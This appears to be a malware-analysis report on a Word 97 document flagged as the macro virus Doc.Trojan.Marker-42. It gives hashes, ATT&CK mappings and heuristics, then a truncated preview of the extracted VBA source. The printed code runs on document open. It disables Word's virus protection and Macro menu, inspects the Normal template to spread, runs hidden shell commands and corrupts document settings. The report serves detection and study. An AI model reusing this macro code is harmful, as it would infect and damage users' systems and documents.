Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3c0c10d8136005eb…

MALICIOUS

Office (OLE)

50.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8970294b6b5e5cf64f4a00d3e5d1131e SHA-1: 03033ae1630b2bd3f7fab07fb395d4a4ebdb8f76 SHA-256: 3c0c10d8136005eb12828854365a5d79f41cae27b21e5249cdb7d98c26c4f935
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function for execution. This indicates an attempt to run arbitrary code, likely to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Marker-42' further supports the malicious nature of the file.

Heuristics 5

  • ClamAV: Doc.Trojan.Marker-42 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-42
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 43028 bytes
SHA-256: 58cfff28744de287b3bc96c5e0ada06cb0d1543a45e314d35226e80869dd5677
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
  'New Era of C&AVir. More Powerfull
  On Error Resume Next
  Dim Sw_Doc_Infec, Sw_Pln_Infec, Activa_Doc, Activa_Pln, Acci_Arch, Rompe As Boolean
  Dim Dc, Pl As Object
  Dim linwork, LCDoc, LCPln, parchi, pext, pext1, docum As String
  Dim Accion1, Accion2, LinDoc, LinPln, Compara As Integer
  Const cyav = "Este Es <C&AVir>"
  Const pnomus = "***< C & A V i r >***"
  'Inicializa Variables
  Sw_Doc_Infec = False
  Sw_Pln_Infec = False
Activa_Doc = True
Activa_Pln = False
  CommandBars("Tools").Controls("Macro").Enabled = False
  CommandBars("Tools").Controls("Macro").Visible = False
  Options.VirusProtection = (1 - 1)
  Options.SaveNormalPrompt = (1 - 1)
  Options.ConfirmConversions = (1 - 1)
  Options.CreateBackup = (1 - 1)
  Set Dc = ActiveDocument.VBProject.VbComponents.Item(1)
  Set Pl = NormalTemplate.VBProject.VbComponents.Item(1)
  LinPln = Pl.CodeModule.Countoflines
  LinDoc = Dc.CodeModule.Countoflines
  Sw_Pln_Infec = Pl.CodeModule.Find(cyav, 1, 1, 10000, 10000)
  Sw_Doc_Infec = Dc.CodeModule.Find(cyav, 1, 1, 10000, 10000)
  Acci_Arch = False
  Randomize
  If Activa_Doc = True Then
    If Date > 36433 Then
      Dia = Day(Date)
      If Dia = 1 Then
        Ptp = Int(6 * Rnd)
        Select Case Ptp
          Case 1
            Acci_Arch = True
            pext = "*.doc"
            pext1 = "1"
          Case 2
            Acci_Arch = True
            pext = "*.bat"
            pext1 = "2"
          Case 3
            Acci_Arch = True
            pext = "*.sys"
            pext1 = "3"
          Case 4
            Acci_Arch = False
            pext = ""
            pext1 = ""
          Case 5
            Acci_Arch = True
            pext = "*.ini"
            pext1 = "4"
        End Select
        If Acci_Arch = True Then
          parchi = "IOBuff" & pext1 & ".vxd"
          Shell "command.com /c dir \" & pext & "/s/b>>\" & parchi, vbHide
        End If
      End If
      DiaSem = WeekDay(Date)
      DiaSem = DiaSem + 3
      Hacer = Int(DiaSem * Rnd)
      If Hacer = Day(Now) Or (Hacer * 3) = Minute(Now) Then
        Select Case Hacer
          Case 1
            Options.BlueScreen = True
            Options.CheckGrammarAsYouType = False
            Options.CheckSpellingAsYouType = False
            ActiveDocument.ShowGrammaticalErrors = False
            ActiveDocument.ShowSpellingErrors = False
            ActiveDocument.CommandBars.LargeButtons = True
            Application.ActiveWindow.DisplayVerticalScrollBar = False
          Case 2
            With ActiveDocument.PageSetup.LineNumbering
                 .Active = True
                 .StartingNumber = 3
                 .CountBy = 3
                 .RestartMode = wdRestartSection
            End With
            ActiveDocument.Save
            If ActiveDocument.CommandBars.LargeButtons = True Then ActiveDocument.CommandBars.LargeButtons = False
            ActiveDocument.ActiveWindow.Caption = ActiveDocument.ActiveWindow.Caption & " - Pura Basura!!"
            If ActiveDocument.Saved = False Then ActiveDocument.Save
          Case 3
            With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).PageNumbers
                 .NumberStyle = wdPageNumberStyleLowercaseRoman
                 .IncludeChapterNumber = True
                 .RestartNumberingAtSection = True
                 .StartingNumber = 99
                 .Add PageNumberAlignment:=wdAlignPageNumberCenter, FirstPage:=True
            End With
            Application.ActiveWindow.DisplayHorizontalScrollBar = False
            Application.ActiveWindow.DisplayVerticalScrollBar = False
            If ActiveDocument.Saved = False Then ActiveDocument.Save
            If Options.BlueScreen = True Then Options.BlueScreen
... (truncated)